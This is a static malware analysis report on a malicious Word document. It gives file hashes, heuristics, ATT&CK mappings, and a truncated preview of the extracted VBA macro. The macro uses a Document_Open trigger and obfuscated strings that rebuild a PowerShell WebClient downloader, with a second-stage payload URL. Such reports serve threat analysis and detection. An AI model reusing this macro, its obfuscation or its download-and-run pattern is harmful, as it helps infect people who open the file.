Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b47726569e22a0f…

MALICIOUS

Office (OLE)

Size: 145.0 KB
Created: 2018-04-25 12:31:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: 9af71076c6365b6d59534d5d1ef0a6c1
SHA-1: 23483cb8c661ab4617720dc5e6d290aa4f416a27
SHA-256: 7b47726569e22a0f8d69d2df9cd79a73c3b26a069984d089360b91f56ffc4e06
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. A 'Document_Open' macro is present and leads to a 'Shell()' call, indicating an attempt to execute external code. The macro likely downloads and executes a second-stage payload from the embedded URL: http://triGC9+GC9nityprGC9+GC9oGC9+GC9sound.com/1jeI1/KAyGC9+GC9.SpliGC9+GC9YBu1. Note that the URL as extracted still carries the 'GC9+GC9' fragments that obfuscate the macro's strings; the extracted PowerShell fragment '.REPlAce(([ChaR]71+[ChaR]67+[ChaR]57), ...' (the characters 'G', 'C', '9') indicates these are stripped at runtime, so the literal string should be de-obfuscated before being used as an indicator. The ClamAV detection 'Doc.Dropper.Agent-6517621-0' further confirms its dropper functionality.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6517621-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6517621-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://triGC9+GC9nityprGC9+GC9oGC9+GC9sound.com/1jeI1/KAyGC9+GC9.SpliGC9+GC9YBu1 — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  38164 bytes
SHA-256: 32ea05e5853c634fa09024fb753381d3988e2d0a3f39686301d77d3b46ba4d52
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "TLhmRtLsZKTd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uBWMcM(jIWXci)
YaFHc = 6527 * zrtns + 34257 * ChrB(24279 * Rnd(89155) - 80060 + ENmzJ) - 41860 - Rnd(iGzzT) + 90520 - WLHzO * 48687 * Chr(BVOwK)
End Sub
Sub YkuTpS(SOsKO)
rYVFR = 56925 * qRjKNj + 31380 * ChrB(95276 * Rnd(5282) - 83840 + Czsoz) - 22094 - Rnd(KBZkHT) + 93640 - JhifPw * 37268 * Chr(mHEkG)
CXQXT = 17058 * MDaKb + 13566 * ChrB(54909 * Rnd(43174) - 10494 + MNcWi) - 36144 - Rnd(bbilF) + 64258 - aYAwBU * 69675 * Chr(nWziD)
opqrh = 94940 * XdmTFt + 91648 * ChrB(84226 * Rnd(50253) - 56347 + VhjCG) - 56982 - Rnd(kZLZF) + 49642 - PBmlr * 87673 * Chr(kBDuO)
End Sub
Sub wboINt(IWmljN)
wXjzY = 24393 * qsIFi + 68674 * ChrB(66082 * Rnd(72648) - 61676 + IswXJl) - 5962 - Rnd(MjwsO) + 2180 - iWbMU * 10801 * Chr(BQGjf)
fJIWq = 12106 * rPznmd + 72707 * ChrB(22392 * Rnd(56429) - 35691 + dHDDNG) - 49069 - Rnd(amqhR) + 50856 - AjDbZ * 4675 * Chr(XKPXo)
End Sub
Private Sub Document_open()
On Error Resume Next
rTKYw = 18119 * YzbwB + 94496 * ChrB(59774 * Rnd(61232) - 83676 + iiMhc) - 10313 - Rnd(CtuUj) + 85765 - qSATGb * 35004 * Chr(HUjBEG)
HvWQKEKuKTwpCN (cXcjJ + TSNldAaI + obrOOC)
FOkoG = 76899 * jzLZQ + 67008 * ChrB(98815 * Rnd(51140) - 84337 + bABcQ) - 45316 - Rnd(DiGBqI) + 9932 - Zwdtks * 89509 * Chr(AqfLD)
End Sub
Sub biOkq(NAtoqs)
XhEsoG = 63453 * mVhHIh + 69993 * ChrB(1508 * Rnd(72010) - 72014 + onHYn) - 11902 - Rnd(SiYCo) + 4232 - HWjwzq * 10946 * Chr(ZoMjc)
FdzIDf = 6554 * QIRmXn + 4541 * ChrB(34889 * Rnd(70402) - 63747 + QBKBEn) - 90614 - Rnd(SOTMG) + 57549 - NBZtlW * 77437 * Chr(GaiLS)
UGDiB = 23278 * ubvUIZ + 70926 * ChrB(64973 * Rnd(93652) - 93026 + IoaAt) - 82514 - Rnd(IbqEba) + 54245 - owIPhE * 34277 * Chr(SZiYd)
End Sub
Sub DdJdSC(rTNMjt)
qqAUsf = 71884 * ZjOGqm + 15952 * ChrB(52444 * Rnd(28782) - 34942 + KYMuz) - 14248 - Rnd(wwfuD) + 96442 - hLbYJ * 61509 * Chr(MQDcPL)
End Sub
Sub sirwu(iLdwD)
ThoHf = 57256 * vJbjC + 10914 * ChrB(73433 * Rnd(38391) - 97644 + JRivN) - 11314 - Rnd(nvIjd) + 42139 - fVvMQX * 18892 * Chr(zwQCR)
ptIzj = 8002 * iVRFb + 51750 * ChrB(38017 * Rnd(69560) - 40846 + SntBhJ) - 48697 - Rnd(bzlSj) + 60053 - oLzCA * 67418 * Chr(RMAAiH)
End Sub

Attribute VB_Name = "wqndOzOXBIjjt"
Sub GiMlm(nPViVA)
VjAjf = 33868 * iHzoV + 64314 * ChrB(93445 * Rnd(33498) - 19098 + SRplLi) - 76990 - Rnd(rOBjU) + 10983 - NYtqA * 53053 * Chr(Ridwk)
End Sub
Function TSNldAaI()
On Error Resume Next
kdwZHV = 12728 * vCaOi + 89019 * ChrB(79414 * Rnd(6287) - 72377 + YCczB) - 61568 - Rnd(MdPJA) + 32016 - RZjZdk * 87067 * Chr(CYsrHp)
wIzFCtL = iItQud("%8XUmfGC9+GC9d.nexGC9+GC9t(GC9+GC91000GC9+GC90,'+' GC9+GC9282133GC9+GC9);GC9+GC9bGC9+GC97dADCGC9+GC9XG0Pz", ziwqb - ziwqb + 7 + ziwqb - ziwqb, ziwqb - ziwqb + 96 + ziwqb - ziwqb)
jbsPO = 74063 * IlbSU + 91566 * ChrB(84237 * Rnd(83500) - 83944 + mpwINP) - 49705 - Rnd(OiADH) + 19101 - PuznR * 70650 * Chr(wsRvw)
wkiAlz = 46810 * UjPYj + 58047 * ChrB(64540 * Rnd(36873) - 58610 + urULjf) - 95736 - Rnd(iifsf) + 59239 - ndEnzJ * 12072 * Chr(NLDRu)
zbwKtOpzi = iItQud("jIFdW+[ChaR]82+[ChaR]76),[sTriNG][ChaR]36).REPlAce(([ChaR]71+[ChaR]67+[ChaR]57),i,", QzCLh - QzCLh + 6 + QzCLh - QzCLh, QzCLh - QzCLh + 75 + QzCLh - QzCLh)
JAzkvj = 95834 * mBzCS + 36996 * ChrB(89094 * Rnd(78957) - 52495 + lcwAc) - 61065 - Rnd(XokGAf) + 25891 - qVdiI * 70374 * Chr(wZqDow)
hrFGq = 78663 * RMdQAs + 75608 * ChrB(92338 * Rnd(2043) - 28903 + riWPz) - 87038 - Rnd(pzhzDk) + 55727 - hMzDrH * 71260 * Chr(ZdKIUA)
fkYARL = iItQud("ELY0Z2GC9+GC'+'9bjGC9+GC9ecGC9+GC9tKAy)GC9+GC9 System.NeGC9+GC9t.GC9+GC9WebClieGC9+GC9nt;b7dNSBGC9+GC9 = b7GC9+GC9dnsGC9+GC9adaGC9+GC9s4UW", nLYjCj - nLYjCj + 7 + nLYjCj - nLYjCj, nLYjCj - nLYjCj + 129 + nLYjCj - nLYjCj)
SQWDz = 74379 * StLXBr + 5976 * ChrB(38188 * Rnd(17717) - 86036 + AKbwzX) - 99365 - Rnd(rzlnk) + 27582 - jOjhhf * 25339 * Chr(tDrUG)
Uwprzd = 2
... (truncated)